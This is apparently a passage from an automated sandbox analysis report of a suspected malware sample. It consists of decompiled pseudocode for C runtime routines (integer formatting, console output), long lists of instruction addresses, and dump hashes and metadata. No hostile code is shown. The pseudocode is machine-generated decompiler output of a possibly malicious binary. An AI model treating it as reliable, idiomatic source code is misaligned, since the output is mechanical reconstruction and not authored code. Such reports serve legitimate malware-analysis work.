                            									__ecx =  *(__ebp - 0x2bc);
                            									__edx =  *(__ebp - 0x2c0);
                            									__eax = E0041CE40( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8),  *(__ebp - 0x2c0));
                            									 *(__ebp - 0x2ac) = __eax;
                            									__eax =  *(__ebp - 8);
                            									asm("cdq");
                            									__eax =  *(__ebp - 0x2bc);
                            									__ecx =  *(__ebp - 0x2c0);
                            									 *(__ebp - 0x2c0) = E0041CDD0( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8), __edx);
                            									 *(__ebp - 0x2bc) = __edx;
                            									__eflags =  *(__ebp - 0x2ac) - 0x39;
                            									if( *(__ebp - 0x2ac) > 0x39) {
                            										__edx =  *(__ebp - 0x2ac);
                            										__edx =  *(__ebp - 0x2ac) +  *(__ebp - 0x260);
                            										__eflags = __edx;
                            										 *(__ebp - 0x2ac) = __edx;
                            									}
                            									__eax =  *(__ebp - 4);
                            									__cl =  *(__ebp - 0x2ac);
                            									 *( *(__ebp - 4)) = __cl;
                            									 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            									 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            									L181:
                            									__ecx =  *(__ebp - 0x30);
                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            									__eflags =  *(__ebp - 0x30);
                            									if( *(__ebp - 0x30) > 0) {
                            										goto L183;
                            									}
                            									goto L182;
                            								}
                            							}
                            							L168:
                            							__eflags =  *(__ebp - 0x2b8);
                            							if( *(__ebp - 0x2b8) >= 0) {
                            								goto L170;
                            							}
                            							goto L169;
                            							L170:
                            							__ecx =  *(__ebp - 0x2b8);
                            							 *(__ebp - 0x2c0) =  *(__ebp - 0x2b8);
                            							__edx =  *(__ebp - 0x2b4);
                            							 *(__ebp - 0x2bc) =  *(__ebp - 0x2b4);
                            							goto L171;
                            						}
                            					}
                            				}
                            			}













                            0x00422027
                            0x00422027
                            0x00422027
                            0x00422027
                            0x00422027
                            0x00422027
                            0x00422027
                            0x00422031
                            0x00422031
                            0x00422031
                            0x0042203b
                            0x0042203b
                            0x00422041
                            0x00422043
                            0x0042204d
                            0x0042204d
                            0x00422050
                            0x00422053
                            0x00422053
                            0x0042207a
                            0x0042207a
                            0x0042207d
                            0x0042207d
                            0x00422082
                            0x004220a4
                            0x004220a4
                            0x004220aa
                            0x004220cc
                            0x004220cc
                            0x004220cf
                            0x00422116
                            0x00422116
                            0x00422119
                            0x00422136
                            0x0042213a
                            0x00422142
                            0x00422142
                            0x00422144
                            0x0042214a
                            0x0042211b
                            0x0042211b
                            0x0042211f
                            0x00422127
                            0x00422128
                            0x0042212e
                            0x0042212e
                            0x004220d1
                            0x004220d4
                            0x004220d4
                            0x004220d7
                            0x004220f5
                            0x00422101
                            0x00422104
                            0x00422105
                            0x0042210b
                            0x004220d9
                            0x004220d9
                            0x004220dd
                            0x004220e5
                            0x004220e6
                            0x004220e7
                            0x004220ed
                            0x004220ed
                            0x00422111
                            0x004220ac
                            0x004220ac
                            0x004220b8
                            0x004220be
                            0x004220be
                            0x00422084
                            0x00422084
                            0x00422090
                            0x00422096
                            0x00422096
                            0x00422153
                            0x00422153
                            0x00422156
                            0x00000000
                            0x00000000
                            0x00422158
                            0x00422158
                            0x0042215f
                            0x00000000
                            0x00000000
                            0x00422161
                            0x00422161
                            0x0042216c
                            0x00422172
                            0x00422174
                            0x0042217a
                            0x0042217d
                            0x0042217f
                            0x00422185
                            0x0042218e
                            0x00422193
                            0x004221b0
                            0x004221b3
                            0x004221b3
                            0x004221b8
                            0x004221bd
                            0x004221bd
                            0x004221c3
                            0x004221c5
                            0x004221cb
                            0x004221d1
                            0x004221d1
                            0x004221da
                            0x004221da
                            0x004221c3
                            0x004221e0
                            0x004221e4
                            0x004221f2
                            0x004221f5
                            0x004221f8
                            0x004221ff
                            0x00422201
                            0x00422201
                            0x004221e6
                            0x004221e6
                            0x004221e6
                            0x0042220e
                            0x0042220e
                            0x00422214
                            0x00422216
                            0x00422216
                            0x0042221d
                            0x00422220
                            0x00422223
                            0x00422223
                            0x00422223
                            0x00422229
                            0x0042222c
                            0x0042222f
                            0x00422231
                            0x00000000
                            0x00000000
                            0x00422233
                            0x00422239
                            0x00422239
                            0x0042223f
                            0x004222bc
                            0x004222bf
                            0x004222c2
                            0x004222c5
                            0x004222c8
                            0x004222cb
                            0x004222d1
                            0x004222d1
                            0x004222d7
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x0042230c
                            0x0042230f
                            0x0042230f
                            0x00422312
                            0x00422317
                            0x00422317
                            0x0042231c
                            0x0042232e
                            0x0042232e
                            0x00422331
                            0x00422343
                            0x00422343
                            0x00422346
                            0x00422348
                            0x0042234c
                            0x0042234c
                            0x00422333
                            0x00422333
                            0x00422337
                            0x00422337
                            0x0042231e
                            0x0042231e
                            0x00422322
                            0x00422322
                            0x0042231c
                            0x00422356
                            0x00422359
                            0x0042235c
                            0x00422365
                            0x00422365
                            0x00422368
                            0x0042236a
                            0x00422371
                            0x00422375
                            0x0042237e
                            0x00422383
                            0x00422386
                            0x0042238d
                            0x00422391
                            0x00422395
                            0x004223a1
                            0x004223a4
                            0x004223a4
                            0x004223a7
                            0x004223ac
                            0x004223ac
                            0x004223af
                            0x004223b1
                            0x004223b8
                            0x004223bc
                            0x004223c5
                            0x004223ca
                            0x004223af
                            0x004223cd
                            0x004223d1
                            0x004224a5
                            0x004224a5
                            0x004224ac
                            0x004224b0
                            0x004224b4
                            0x004224b8
                            0x00000000
                            0x004223d7
                            0x004223d7
                            0x004223d7
                            0x004223db
                            0x00000000
                            0x00000000
                            0x004223e1
                            0x004223e1
                            0x004223eb
                            0x004223ee
                            0x004223f4
                            0x004223f7
                            0x004223fd
                            0x004223fd
                            0x004223fd
                            0x00422409
                            0x0042240c
                            0x00422412
                            0x00422414
                            0x00000000
                            0x00000000
                            0x0042241a
                            0x0042241a
                            0x00422423
                            0x0042242a
                            0x00422434
                            0x0042243b
                            0x0042244a
                            0x00422456
                            0x00422459
                            0x0042245f
                            0x00422466
                            0x00422471
                            0x00422471
                            0x00000000
                            0x00422471
                            0x00422468
                            0x00422468
                            0x0042246f
                            0x0042247d
                            0x0042247d
                            0x00422484
                            0x00422488
                            0x00422496
                            0x00000000
                            0x0042249b
                            0x00000000
                            0x0042246f
                            0x004224a3
                            0x004224c0
                            0x004224c0
                            0x004224c7
                            0x004224cc
                            0x004224cc
                            0x004224cf
                            0x004224d1
                            0x004224d8
                            0x004224dc
                            0x004224e5
                            0x004224ea
                            0x004224cf
                            0x004224c7
                            0x004224ed
                            0x004224ed
                            0x004224f1
                            0x004224f9
                            0x00422501
                            0x00422501
                            0x00422508
                            0x00422508
                            0x004215df
                            0x004215e5
                            0x004215f2
                            0x004215f7
                            0x00000000
                            0x0042160a
                            0x00421614
                            0x0042163b
                            0x00421622
                            0x00421633
                            0x00421633
                            0x00421614
                            0x00421645
                            0x0042164b
                            0x00421657
                            0x0042165a
                            0x00421668
                            0x0042166b
                            0x00421678
                            0x0042171d
                            0x00421723
                            0x00421729
                            0x00421730
                            0x00000000
                            0x00000000
                            0x00421736
                            0x0042173c
                            0x00000000
                            0x00421743
                            0x00421743
                            0x0042175b
                            0x00421760
                            0x00421763
                            0x00421765
                            0x0042181f
                            0x00421832
                            0x00421837
                            0x00000000
                            0x0042176b
                            0x0042177e
                            0x00421783
                            0x00421789
                            0x0042178b
                            0x00421794
                            0x00421794
                            0x00421797
                            0x004217a3
                            0x004217a7
                            0x004217ad
                            0x004217af
                            0x004217b4
                            0x004217b6
                            0x004217bb
                            0x004217c0
                            0x004217c2
                            0x004217c7
                            0x004217ca
                            0x004217cd
                            0x004217cf
                            0x004217cf
                            0x004217cd
                            0x004217d0
                            0x004217d0
                            0x004217d7
                            0x00000000
                            0x004217d9
                            0x004217de
                            0x004217fa
                            0x00421802
                            0x0042180f
                            0x00421814
                            0x00000000
                            0x00421814
                            0x004217d7
                            0x00000000
                            0x0042183f
                            0x0042183f
                            0x00421846
                            0x00421849
                            0x0042184c
                            0x0042184f
                            0x00421852
                            0x00421855
                            0x00421858
                            0x0042185f
                            0x00421866
                            0x00000000
                            0x00000000
                            0x00421872
                            0x00421872
                            0x00421879
                            0x00421885
                            0x00421888
                            0x0042188e
                            0x00421895
                            0x00000000
                            0x00000000
                            0x00421897
                            0x00421897
                            0x0042189d
                            0x0042189d
                            0x004218a4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004218e7
                            0x004218e7
                            0x004218ee
                            0x004218f1
                            0x0042191b
                            0x0042191e
                            0x0042191e
                            0x00421921
                            0x00421928
                            0x00421928
                            0x0042192c
                            0x004218f3
                            0x004218f3
                            0x004218ff
                            0x00421902
                            0x00421906
                            0x00421908
                            0x0042190b
                            0x0042190b
                            0x0042190e
                            0x00421914
                            0x00421916
                            0x00421916
                            0x00421919
                            0x00000000
                            0x00000000
                            0x00421934
                            0x00421934
                            0x00000000
                            0x00000000
                            0x00421940
                            0x00421940
                            0x00421947
                            0x0042194a
                            0x0042196a
                            0x0042196d
                            0x0042196d
                            0x00421977
                            0x00421977
                            0x0042197b
                            0x0042194c
                            0x0042194c
                            0x00421958
                            0x0042195b
                            0x0042195f
                            0x00421961
                            0x00421961
                            0x00421968
                            0x00000000
                            0x00000000
                            0x00421983
                            0x00421983
                            0x0042198a
                            0x00421996
                            0x00421999
                            0x0042199f
                            0x004219a6
                            0x00421ab9
                            0x00000000
                            0x00421ab9
                            0x004219ac
                            0x004219ac
                            0x004219b2
                            0x004219b2
                            0x004219b9
                            0x00000000
                            0x004219ef
                            0x004219ef
                            0x004219f2
                            0x004219f5
                            0x004219f8
                            0x00421a20
                            0x00421a20
                            0x00421a23
                            0x00421a26
                            0x00421a29
                            0x00421a4e
                            0x00421a4e
                            0x00421a51
                            0x00421a54
                            0x00421a57
                            0x00421a90
                            0x00421aa1
                            0x00000000
                            0x00421aa1
                            0x00421a59
                            0x00421a59
                            0x00421a5c
                            0x00421a5f
                            0x00421a62
                            0x00000000
                            0x00000000
                            0x00421a64
                            0x00421a64
                            0x00421a67
                            0x00421a6a
                            0x00421a6d
                            0x00000000
                            0x00000000
                            0x00421a6f
                            0x00421a6f
                            0x00421a72
                            0x00421a75
                            0x00421a78
                            0x00000000
                            0x00000000
                            0x00421a7a
                            0x00421a7a
                            0x00421a7d
                            0x00421a80
                            0x00421a83
                            0x00000000
                            0x00000000
                            0x00421a85
                            0x00421a85
                            0x00421a88
                            0x00421a8b
                            0x00421a8e
                            0x00421a92
                            0x00000000
                            0x00421a92
                            0x00000000
                            0x00421a8e
                            0x00421a2b
                            0x00421a2b
                            0x00421a2e
                            0x00421a32
                            0x00421a35
                            0x00000000
                            0x00421a37
                            0x00421a3a
                            0x00421a3d
                            0x00421a40
                            0x00421a43
                            0x00421a49
                            0x00000000
                            0x00421a49
                            0x00421a35
                            0x004219fa
                            0x004219fa
                            0x004219fd
                            0x00421a01
                            0x00421a04
                            0x00000000
                            0x00421a06
                            0x00421a09
                            0x00421a0c
                            0x00421a0f
                            0x00421a12
                            0x00421a18
                            0x00000000
                            0x00421a18
                            0x00000000
                            0x00421aa3
                            0x00421aa6
                            0x00421aa9
                            0x00000000
                            0x00000000
                            0x004219c0
                            0x004219c0
                            0x004219c3
                            0x004219c6
                            0x004219c9
                            0x004219e1
                            0x004219e4
                            0x004219e4
                            0x004219e7
                            0x004219cb
                            0x004219ce
                            0x004219d1
                            0x004219d7
                            0x004219dc
                            0x004219dc
                            0x00000000
                            0x00000000
                            0x00421aae
                            0x00421aae
                            0x00421ab1
                            0x00421ab1
                            0x00421ab6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00421abe
                            0x00421abe
                            0x00421ac5
                            0x00421ad1
                            0x00421ad4
                            0x00421ada
                            0x00421ae1
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00422302
                            0x00421ae7
                            0x00421aed
                            0x00421aed
                            0x00421af4
                            0x00000000
                            0x00421e4e
                            0x00421e4e
                            0x00421e55
                            0x00421e5c
                            0x00421e5c
                            0x00421e5f
                            0x00000000
                            0x00000000
                            0x00421afb
                            0x00421afe
                            0x00421afe
                            0x00421b04
                            0x00421b06
                            0x00421b09
                            0x00421b09
                            0x00421b0e
                            0x00421b0e
                            0x00000000
                            0x00000000
                            0x00421c3b
                            0x00421c3e
                            0x00421c3e
                            0x00421c43
                            0x00421c45
                            0x00421c48
                            0x00421c48
                            0x00421c4e
                            0x00421c4e
                            0x00000000
                            0x00000000
                            0x0042201b
                            0x0042201b
                            0x00422031
                            0x00422031
                            0x0042203b
                            0x0042203b
                            0x00422041
                            0x00422043
                            0x0042204d
                            0x0042204d
                            0x00422050
                            0x00422053
                            0x00422053
                            0x00000000
                            0x00000000
                            0x00421ba5
                            0x00421ba5
                            0x00421bb1
                            0x00421bb7
                            0x00421bbe
                            0x00421bcc
                            0x00421bcc
                            0x00421bd2
                            0x00421bd5
                            0x00421be1
                            0x00421c36
                            0x00000000
                            0x00421c36
                            0x00421bc0
                            0x00421bc0
                            0x00421bc6
                            0x00421bca
                            0x00421be6
                            0x00421be9
                            0x00421be9
                            0x00421bef
                            0x00421c17
                            0x00421c1e
                            0x00421c24
                            0x00421c27
                            0x00421c2a
                            0x00421c30
                            0x00421c33
                            0x00421bf1
                            0x00421bf1
                            0x00421bf7
                            0x00421bfa
                            0x00421bfd
                            0x00421c03
                            0x00421c06
                            0x00421c09
                            0x00421c0b
                            0x00421c0e
                            0x00421c0e
                            0x00000000
                            0x00421bef
                            0x00000000
                            0x00000000
                            0x00421e65
                            0x00421e68
                            0x00421e6b
                            0x00421e6e
                            0x00421e74
                            0x00421e77
                            0x00421e7e
                            0x00421e82
                            0x00421e8d
                            0x00421e8d
                            0x00421e91
                            0x00421ea8
                            0x00421ea8
                            0x00421eaf
                            0x00421eb1
                            0x00421eb1
                            0x00421eb8
                            0x00421eb8
                            0x00421ebf
                            0x00421ed0
                            0x00421edf
                            0x00421ee2
                            0x00421ee6
                            0x00421efc
                            0x00421ee8
                            0x00421ee8
                            0x00421eeb
                            0x00421ef1
                            0x00421ef7
                            0x00421ef7
                            0x00421ee6
                            0x00421f06
                            0x00421f09
                            0x00421f0c
                            0x00421f0f
                            0x00421f12
                            0x00421f15
                            0x00421f1b
                            0x00421f21
                            0x00421f29
                            0x00421f2a
                            0x00421f2d
                            0x00421f2e
                            0x00421f31
                            0x00421f32
                            0x00421f39
                            0x00421f3a
                            0x00421f3d
                            0x00421f3e
                            0x00421f41
                            0x00421f42
                            0x00421f48
                            0x00421f49
                            0x00421f57
                            0x00421f59
                            0x00421f5f
                            0x00421f5f
                            0x00421f65
                            0x00421f67
                            0x00421f6b
                            0x00421f6d
                            0x00421f75
                            0x00421f76
                            0x00421f79
                            0x00421f7a
                            0x00421f88
                            0x00421f8a
                            0x00421f8a
                            0x00421f6b
                            0x00421f8d
                            0x00421f94
                            0x00421f97
                            0x00421f9c
                            0x00421f9c
                            0x00421fa2
                            0x00421fa4
                            0x00421fac
                            0x00421fad
                            0x00421fb0
                            0x00421fb1
                            0x00421fc0
                            0x00421fc2
                            0x00421fc2
                            0x00421fa2
                            0x00421fc5
                            0x00421fc8
                            0x00421fcb
                            0x00421fce
                            0x00421fd3
                            0x00421fd9
                            0x00421fdc
                            0x00421fdf
                            0x00421fdf
                            0x00421fe2
                            0x00421fe2
                            0x00421fe5
                            0x00421ff1
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00000000
                            0x00422302
                            0x00421e93
                            0x00421e93
                            0x00421e9a
                            0x00421e9d
                            0x00000000
                            0x00000000
                            0x00421e9f
                            0x00421e9f
                            0x00000000
                            0x00421e9f
                            0x00421e84
                            0x00421e84
                            0x00000000
                            0x00000000
                            0x00421b11
                            0x00421b14
                            0x00421b14
                            0x00421b1a
                            0x00421b75
                            0x00421b7d
                            0x00421b84
                            0x00421b8a
                            0x00421b90
                            0x00421b1c
                            0x00421b1c
                            0x00421b26
                            0x00421b2a
                            0x00421b32
                            0x00421b39
                            0x00421b46
                            0x00421b4d
                            0x00421b59
                            0x00421b5f
                            0x00421b66
                            0x00421b68
                            0x00421b68
                            0x00421b6f
                            0x00421b97
                            0x00421b9d
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00000000
                            0x00421ff9
                            0x00421ffc
                            0x00421fff
                            0x00422002
                            0x0042207a
                            0x0042207d
                            0x0042207d
                            0x00422082
                            0x004220a4
                            0x004220a4
                            0x004220aa
                            0x004220cc
                            0x004220cc
                            0x004220cf
                            0x00422116
                            0x00422116
                            0x00422119
                            0x00422136
                            0x0042213a
                            0x00422142
                            0x00422142
                            0x00422144
                            0x0042214a
                            0x0042211b
                            0x0042211b
                            0x0042211f
                            0x00422127
                            0x00422128
                            0x0042212e
                            0x0042212e
                            0x004220d1
                            0x004220d4
                            0x004220d4
                            0x004220d7
                            0x004220f5
                            0x00422101
                            0x00422104
                            0x00422105
                            0x0042210b
                            0x004220d9
                            0x004220d9
                            0x004220dd
                            0x004220e5
                            0x004220e6
                            0x004220e7
                            0x004220ed
                            0x004220ed
                            0x00422111
                            0x004220ac
                            0x004220ac
                            0x004220b8
                            0x004220be
                            0x004220be
                            0x00422084
                            0x00422084
                            0x00422090
                            0x00422096
                            0x00422096
                            0x00422153
                            0x00422153
                            0x00422156
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00421d57
                            0x00421d57
                            0x00421d63
                            0x00421d69
                            0x00421d6e
                            0x00421d70
                            0x00421e1a
                            0x00421e1d
                            0x00421e1d
                            0x00421e20
                            0x00421e34
                            0x00421e3a
                            0x00421e40
                            0x00421e22
                            0x00421e22
                            0x00421e2f
                            0x00421e2f
                            0x00421e42
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00422302
                            0x00421d76
                            0x00421d76
                            0x00421d76
                            0x00421d78
                            0x00421d86
                            0x00421d7a
                            0x00421d7a
                            0x00421d7a
                            0x00421d90
                            0x00421d96
                            0x00421d9c
                            0x00421da3
                            0x00421da5
                            0x00421daa
                            0x00421dac
                            0x00421db1
                            0x00421db6
                            0x00421db8
                            0x00421dbd
                            0x00421dc0
                            0x00421dc3
                            0x00421dc5
                            0x00421dc5
                            0x00421dc3
                            0x00421dc6
                            0x00421dcd
                            0x00421e15
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00421dcf
                            0x00421dcf
                            0x00421dd4
                            0x00421df0
                            0x00421df8
                            0x00421e02
                            0x00421e05
                            0x00421e0a
                            0x00000000
                            0x00421e0a
                            0x00000000
                            0x0042205c
                            0x0042205c
                            0x00422066
                            0x00422066
                            0x0042206c
                            0x0042206e
                            0x00422071
                            0x00422071
                            0x00422077
                            0x00422077
                            0x0042207a
                            0x0042207a
                            0x0042207d
                            0x0042207d
                            0x00422082
                            0x004220a4
                            0x004220a4
                            0x004220aa
                            0x004220cc
                            0x004220cc
                            0x004220cf
                            0x00422116
                            0x00422116
                            0x00422119
                            0x00422136
                            0x0042213a
                            0x00422142
                            0x00422142
                            0x00422144
                            0x0042214a
                            0x0042211b
                            0x0042211b
                            0x0042211f
                            0x00422127
                            0x00422128
                            0x0042212e
                            0x0042212e
                            0x004220d1
                            0x004220d4
                            0x004220d4
                            0x004220d7
                            0x004220f5
                            0x00422101
                            0x00422104
                            0x00422105
                            0x0042210b
                            0x004220d9
                            0x004220d9
                            0x004220dd
                            0x004220e5
                            0x004220e6
                            0x004220e7
                            0x004220ed
                            0x004220ed
                            0x00422111
                            0x004220ac
                            0x004220ac
                            0x004220b8
                            0x004220be
                            0x004220be
                            0x00422084
                            0x00422084
                            0x00422090
                            0x00422096
                            0x00422096
                            0x00422153
                            0x00422153
                            0x00422156
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422156
                            0x00000000
                            0x00422014
                            0x00422014
                            0x00000000
                            0x00000000
                            0x00421c51
                            0x00421c51
                            0x00421c55
                            0x00421c63
                            0x00421c66
                            0x00421c57
                            0x00421c57
                            0x00421c57
                            0x00421c6c
                            0x00421c72
                            0x00421c78
                            0x00421c84
                            0x00421c8a
                            0x00421c8a
                            0x00421c90
                            0x00421cf7
                            0x00421cf7
                            0x00421cfb
                            0x00421cfd
                            0x00421d03
                            0x00421d03
                            0x00421d06
                            0x00421d09
                            0x00421d0f
                            0x00421d0f
                            0x00421d0f
                            0x00421d1b
                            0x00421d1e
                            0x00421d24
                            0x00421d26
                            0x00000000
                            0x00000000
                            0x00421d28
                            0x00421d28
                            0x00421d2e
                            0x00421d31
                            0x00421d33
                            0x00000000
                            0x00000000
                            0x00421d35
                            0x00421d3b
                            0x00421d3e
                            0x00421d3e
                            0x00421d46
                            0x00421d46
                            0x00421d4c
                            0x00421d4c
                            0x00421d4f
                            0x00000000
                            0x00421c92
                            0x00421c92
                            0x00421c92
                            0x00421c96
                            0x00421c98
                            0x00421c9d
                            0x00421c9d
                            0x00421ca0
                            0x00421ca7
                            0x00421caa
                            0x00421cb0
                            0x00421cb0
                            0x00421cb0
                            0x00421cbc
                            0x00421cbf
                            0x00421cc5
                            0x00421cc7
                            0x00000000
                            0x00000000
                            0x00421cc9
                            0x00421cc9
                            0x00421ccf
                            0x00421cd2
                            0x00421cd4
                            0x00000000
                            0x00000000
                            0x00421cd6
                            0x00421cdc
                            0x00421cdf
                            0x00421cdf
                            0x00421ce7
                            0x00421ced
                            0x00421cf0
                            0x00421cf2
                            0x00421d52
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00422302
                            0x00000000
                            0x0042200b
                            0x0042200b
                            0x0042207a
                            0x0042207a
                            0x0042207d
                            0x0042207d
                            0x00422082
                            0x004220a4
                            0x004220a4
                            0x004220aa
                            0x004220cc
                            0x004220cc
                            0x004220cf
                            0x00422116
                            0x00422116
                            0x00422119
                            0x00422136
                            0x0042213a
                            0x00422142
                            0x00422142
                            0x00422144
                            0x0042214a
                            0x0042211b
                            0x0042211b
                            0x0042211f
                            0x00422127
                            0x00422128
                            0x0042212e
                            0x0042212e
                            0x004220d1
                            0x004220d4
                            0x004220d4
                            0x004220d7
                            0x004220f5
                            0x00422101
                            0x00422104
                            0x00422105
                            0x0042210b
                            0x004220d9
                            0x004220d9
                            0x004220dd
                            0x004220e5
                            0x004220e6
                            0x004220e7
                            0x004220ed
                            0x004220ed
                            0x00422111
                            0x004220ac
                            0x004220ac
                            0x004220b8
                            0x004220be
                            0x004220be
                            0x00422084
                            0x00422084
                            0x00422090
                            0x00422096
                            0x00422096
                            0x00422153
                            0x00422153
                            0x00422156
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422156
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00000000
                            0x00000000
                            0x004218c1
                            0x004218c4
                            0x004218c7
                            0x00000000
                            0x00000000
                            0x004218cc
                            0x004218cf
                            0x004218d4
                            0x00000000
                            0x00000000
                            0x004218b6
                            0x004218b6
                            0x004218b9
                            0x004218bc
                            0x00000000
                            0x00000000
                            0x004218ab
                            0x004218ae
                            0x004218b1
                            0x00000000
                            0x00000000
                            0x004218d9
                            0x004218d9
                            0x004218dc
                            0x004218dc
                            0x004218df
                            0x00000000
                            0x00000000
                            0x004218e2
                            0x00000000
                            0x00000000
                            0x0042167e
                            0x00421680
                            0x0042168e
                            0x00421682
                            0x00421682
                            0x00421682
                            0x00421698
                            0x0042169e
                            0x004216ab
                            0x004216ad
                            0x004216b2
                            0x004216b4
                            0x004216b9
                            0x004216be
                            0x004216c0
                            0x004216c5
                            0x004216cb
                            0x004216cd
                            0x004216cd
                            0x004216cb
                            0x004216ce
                            0x004216d5
                            0x00000000
                            0x004216d7
                            0x004216dc
                            0x004216f8
                            0x00421700
                            0x0042170d
                            0x00421712
                            0x004225d1
                            0x004225de
                            0x004225de
                            0x004216d5
                            0x00421678
                            0x0042250d
                            0x0042250d
                            0x00422514
                            0x0042252b
                            0x0042252b
                            0x00422535
                            0x00422535
                            0x0042253b
                            0x00422541
                            0x00422548
                            0x0042254a
                            0x0042254f
                            0x00422551
                            0x00422556
                            0x0042255b
                            0x0042255d
                            0x00422562
                            0x00422565
                            0x00422568
                            0x0042256a
                            0x0042256a
                            0x00422568
                            0x0042256b
                            0x00422572
                            0x004225bd
                            0x004225c6
                            0x004225cb
                            0x00422574
                            0x00422579
                            0x00422595
                            0x0042259d
                            0x004225aa
                            0x004225af
                            0x004225af
                            0x00000000
                            0x00422572
                            0x00422516
                            0x00422516
                            0x0042251d
                            0x00000000
                            0x00000000
                            0x0042251f
                            0x0042251f
                            0x00000000
                            0x0042251f
                            0x00422302
                            0x004222d9
                            0x004222d9
                            0x004222dd
                            0x004222ea
                            0x004222ed
                            0x004222f0
                            0x004222f3
                            0x004222f6
                            0x004222f9
                            0x004222fc
                            0x004222fc
                            0x004222ff
                            0x00000000
                            0x004222ff
                            0x004222df
                            0x004222df
                            0x004222e2
                            0x004222e5
                            0x004222e8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004222e8
                            0x00422241
                            0x00422241
                            0x00422244
                            0x00422247
                            0x0042224e
                            0x00422255
                            0x0042225d
                            0x00422263
                            0x00422266
                            0x00422269
                            0x00422270
                            0x0042227c
                            0x00422282
                            0x00422288
                            0x0042228f
                            0x00422291
                            0x00422297
                            0x00422297
                            0x0042229d
                            0x0042229d
                            0x004222a3
                            0x004222a6
                            0x004222ac
                            0x004222b1
                            0x004222b4
                            0x00422223
                            0x00422223
                            0x00422229
                            0x0042222c
                            0x0042222f
                            0x00422231
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422231
                            0x00422223
                            0x00422163
                            0x00422163
                            0x0042216a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422198
                            0x00422198
                            0x0042219e
                            0x004221a4
                            0x004221aa
                            0x00000000
                            0x004221aa
                            0x0042207a
                            0x00422031

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __aulldiv__aullrem_get_int64_arg
                            • String ID: '$0$9
                            • API String ID: 3120068967-269856862
                            • Opcode ID: 6b4c0f8f9fa620177895e8100de1f6ae1e322b9a31a70426aaa8af2f70567667
                            • Instruction ID: e17a7b984f4f784ba8eb72905e97e8833cfe81279f486c5e3825be96e6f89982
                            • Opcode Fuzzy Hash: 6b4c0f8f9fa620177895e8100de1f6ae1e322b9a31a70426aaa8af2f70567667
                            • Instruction Fuzzy Hash: 0B41F4B1E05229EFDB24CF88DD89BAEB7B5BB44304F5481DAD408A7240C7799E81CF55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 95%
                            			E00419050(void* __edx, void _a4) {
                            				long _v8;
                            				int _v12;
                            				signed int _v16;
                            				void _v24;
                            				signed int _t12;
                            				intOrPtr _t14;
                            				intOrPtr _t25;
                            				void* _t31;
                            				intOrPtr _t33;
                            				intOrPtr _t34;
                            				signed int _t35;
                            
                            				_t31 = __edx;
                            				_t12 =  *0x60a7a4; // 0x859ba81c
                            				_v16 = _t12 ^ _t35;
                            				if( *0x60b3ac == 0) {
                            					L12:
                            					if( *0x60b3ac != 0) {
                            						L16:
                            						_t14 = _a4;
                            					} else {
                            						_v12 = WideCharToMultiByte(GetConsoleOutputCP(), 0,  &_a4, 1,  &_v24, 5, 0, 0);
                            						if( *0x60b514 == 0xffffffff) {
                            							L15:
                            							_t14 = 0xffff;
                            						} else {
                            							_t31 =  *0x60b514; // 0xfffffffe
                            							if(WriteConsoleA(_t31,  &_v24, _v12,  &_v8, 0) != 0) {
                            								goto L16;
                            							} else {
                            								goto L15;
                            							}
                            						}
                            					}
                            				} else {
                            					if( *0x60b514 == 0xfffffffe) {
                            						E0041F0F0();
                            					}
                            					if( *0x60b514 != 0xffffffff) {
                            						_t31 =  *0x60b514; // 0xfffffffe
                            						if(WriteConsoleW(_t31,  &_a4, 1,  &_v8, 0) != 0) {
                            							 *0x60b3ac = 1;
                            							goto L12;
                            						} else {
                            							if( *0x60b3ac != 2 || GetLastError() != 0x78) {
                            								_t14 = 0xffff;
                            							} else {
                            								 *0x60b3ac = 0;
                            								goto L12;
                            							}
                            						}
                            					} else {
